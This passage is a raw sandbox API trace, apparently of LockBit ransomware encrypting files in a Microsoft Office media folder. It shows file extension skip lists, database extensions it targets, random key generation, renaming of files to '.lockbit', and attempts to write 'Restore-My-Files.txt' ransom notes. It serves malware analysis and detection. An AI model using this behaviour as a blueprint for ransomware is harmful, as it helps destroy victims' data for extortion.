lpString2=".GIF") returned 1 [0204.663] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.663] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.663] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.663] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.663] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.663] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.663] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.663] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.663] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.663] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.663] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.663] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.663] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.663] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.663] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.663] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.663] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.663] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.663] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.663] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.663] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.663] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.663] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.663] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.664] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.664] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.664] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.664] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.664] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.664] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.664] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21434_.GIF") returned 1 [0204.664] lstrcmpiW (lpString1="ntldr", lpString2="BD21434_.GIF") returned 1 [0204.664] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21434_.GIF") returned 1 [0204.664] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21434_.GIF") returned 1 [0204.664] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21434_.GIF") returned -1 [0204.664] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21434_.GIF") returned 1 [0204.664] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21434_.GIF") returned 1 [0204.664] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.664] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21434_.GIF") returned=".GIF" [0204.664] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.664] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.664] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.664] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.664] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.664] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.664] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.664] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.664] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.664] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.664] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.664] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.664] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.665] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.665] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.665] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.665] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.665] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.665] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.665] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.665] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.665] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.665] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.665] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.665] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.665] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.665] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.665] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.665] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21434_.GIF.lockbit") returned 78 [0204.665] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21434_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21434_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.667] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.667] malloc (_Size=0x40068) returned 0x3df0008 [0204.667] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=177) returned 1 [0204.667] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.667] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.667] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.667] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.668] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.668] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.668] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.672] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21434_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21434_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.672] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.672] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.672] free (_Block=0x1fa2ed8) [0204.672] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21434_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.672] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.672] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.672] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92f78700, ftCreationTime.dwHighDateTime=0x1bd8f90, ftLastAccessTime.dwLowDateTime=0xbcead480, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x92f78700, ftLastWriteTime.dwHighDateTime=0x1bd8f90, nFileSizeHigh=0x0, nFileSizeLow=0xad, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21435_.GIF", cAlternateFileName="")) returned 1 [0204.672] lstrcmpiW (lpString1=".", lpString2="BD21435_.GIF") returned -1 [0204.672] lstrcmpiW (lpString1="..", lpString2="BD21435_.GIF") returned -1 [0204.672] PathFindExtensionW (pszPath="BD21435_.GIF") returned=".GIF" [0204.672] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.672] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.672] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.672] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.672] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.672] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.673] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.673] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.673] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.673] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.673] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.673] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.673] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.673] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.673] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.673] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.673] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.673] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.673] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.673] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.673] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.673] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.673] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.673] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.673] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.673] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.673] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.673] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.673] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.673] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.673] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.673] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.673] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.673] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.674] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.674] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.674] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.674] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.674] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.674] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.674] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.674] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.674] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.674] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.674] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.674] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.674] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.674] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21435_.GIF") returned 1 [0204.674] lstrcmpiW (lpString1="ntldr", lpString2="BD21435_.GIF") returned 1 [0204.674] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21435_.GIF") returned 1 [0204.674] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21435_.GIF") returned 1 [0204.674] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21435_.GIF") returned -1 [0204.674] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21435_.GIF") returned 1 [0204.674] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21435_.GIF") returned 1 [0204.674] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.674] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21435_.GIF") returned=".GIF" [0204.674] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.674] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.674] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.674] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.674] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.675] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.675] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.675] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.675] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.675] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.675] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.675] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.675] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.675] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.675] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.675] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.675] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.675] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.675] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.675] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.675] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.675] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.675] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.675] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.675] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.675] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.675] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.675] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.675] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21435_.GIF.lockbit") returned 78 [0204.675] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21435_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21435_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.685] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.685] malloc (_Size=0x40068) returned 0x3df0008 [0204.685] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=173) returned 1 [0204.686] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.686] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.686] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.686] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.687] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.687] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.687] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.691] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21435_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21435_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.691] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.691] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.692] free (_Block=0x1fa2ed8) [0204.692] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21435_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.692] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.692] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.692] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5593f900, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbcead480, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x5593f900, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0x14e, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21480_.GIF", cAlternateFileName="")) returned 1 [0204.692] lstrcmpiW (lpString1=".", lpString2="BD21480_.GIF") returned -1 [0204.692] lstrcmpiW (lpString1="..", lpString2="BD21480_.GIF") returned -1 [0204.692] PathFindExtensionW (pszPath="BD21480_.GIF") returned=".GIF" [0204.692] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.692] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.692] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.692] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.692] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.692] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.692] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.692] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.692] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.692] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.692] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.692] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.692] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.692] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.693] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.693] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.693] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.693] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.693] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.693] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.693] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.693] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.693] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.693] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.693] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.693] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.693] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.693] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.693] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.693] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.693] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.693] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.693] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.693] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.693] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.693] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.693] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.693] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.693] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.693] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.693] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.694] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.694] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.694] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.694] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.694] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.694] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.694] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21480_.GIF") returned 1 [0204.694] lstrcmpiW (lpString1="ntldr", lpString2="BD21480_.GIF") returned 1 [0204.694] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21480_.GIF") returned 1 [0204.694] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21480_.GIF") returned 1 [0204.694] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21480_.GIF") returned -1 [0204.694] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21480_.GIF") returned 1 [0204.694] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21480_.GIF") returned 1 [0204.694] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.694] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21480_.GIF") returned=".GIF" [0204.694] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.694] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.694] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.694] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.694] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.694] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.694] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.694] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.694] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.694] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.695] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.695] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.695] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.695] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.695] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.695] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.695] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.695] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.695] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.695] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.695] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.695] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.695] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.695] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.695] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.695] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.695] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.695] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.695] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21480_.GIF.lockbit") returned 78 [0204.695] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21480_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21480_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.697] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.697] malloc (_Size=0x40068) returned 0x3df0008 [0204.697] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=334) returned 1 [0204.697] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 